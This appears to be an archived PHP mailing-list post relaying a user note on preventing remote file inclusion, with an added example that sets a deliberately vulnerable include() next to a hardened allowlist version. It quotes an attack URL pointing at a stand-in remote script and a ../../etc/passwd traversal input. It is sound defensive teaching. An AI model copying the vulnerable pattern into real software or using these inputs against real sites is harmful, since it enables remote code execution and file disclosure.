Professional Web Applications Themes

Topic Review (Newest First)

  • July 11th, 10:41 PM
    Kuju@rack1.php.net

    note 33957 added to features.remote-files

    In response to:

    --------------------

    "Be careful when you use something like index.php?showpage=news.php and include() that $showpage file.
    If a malicious user would call your script as index.php?showpage=http://some.server/script.php it would include that script and run it in *your* script's scope."

    -------------------

    That's true... I suggest passing a parameter that only your code understands, and having a switch / case statement to handle the parameter. Then you can decide what to do with it; every other parameter is discarded.

    Ex:

    -----------
    index.php?showpage=1
    ---------

    in the code that receives this parameter:

    ---------------

    if (!empty($_GET['showpage']))
    {
        switch ($_GET['showpage'])
        {
            case '1': include_once 'inc/news.htm';   break;
            case '2': include_once 'inc/scores.htm'; break;
            case '3': include_once 'inc/pub.htm';    break;
            default:  include_once 'inc/index.htm';
        }
    }
    else
        include_once 'inc/index.htm';
    ------------

    It has worked for me and prevents hacking through the URL. If anyone sees a major default in this, please let me know; I will change my approach to a safer one.

    Kuju
    ----
    Manual Page -- [url]http://www.php.net/manual/en/features.remote-files.php[/url]
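The following is an added example, not part of Kuju's note or the PHP manual: the vulnerable direct-include pattern placed beside an allowlist lookup that does the same job as the switch above but as a data table, with a realpath check as defence in depth. The file names under inc/ and the page keys are assumptions.

```php
<?php
// Added example (not from the original post). Page keys and file names
// under inc/ are assumptions chosen to mirror the switch in the note.

// Vulnerable: the request parameter is used directly as the include path.
// With allow_url_include enabled, a URL in ?showpage= is fetched and
// executed; even without it, ../ sequences can pull in arbitrary local files.
function include_page_vulnerable(array $get): void
{
    include $get['showpage'];
}

// Hardened: the parameter is only a lookup key. The file name comes from a
// fixed map, so no user-controlled string ever reaches include().
const PAGES = [
    '1' => 'news.htm',
    '2' => 'scores.htm',
    '3' => 'pub.htm',
];
const DEFAULT_PAGE = 'index.htm';

function resolve_page(mixed $key, string $baseDir = __DIR__ . '/inc'): string
{
    // Non-string values (e.g. showpage[]=1) and unknown keys both fall back
    // to the default page instead of being interpreted as a path.
    $file = is_string($key) ? (PAGES[$key] ?? DEFAULT_PAGE) : DEFAULT_PAGE;

    $root = realpath($baseDir);
    $path = realpath($baseDir . '/' . $file);

    // Defence in depth: the resolved file must exist and lie inside $baseDir,
    // which catches a mistake in the PAGES table itself.
    if ($root === false || $path === false
        || strncmp($path, $root . DIRECTORY_SEPARATOR, strlen($root) + 1) !== 0) {
        throw new RuntimeException('page file missing or outside include directory');
    }
    return $path;
}

// ?showpage=1 resolves to inc/news.htm; ?showpage=http://some.server/script.php
// and ?showpage=../../etc/passwd both resolve to inc/index.htm.
include_once resolve_page($_GET['showpage'] ?? null);
```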
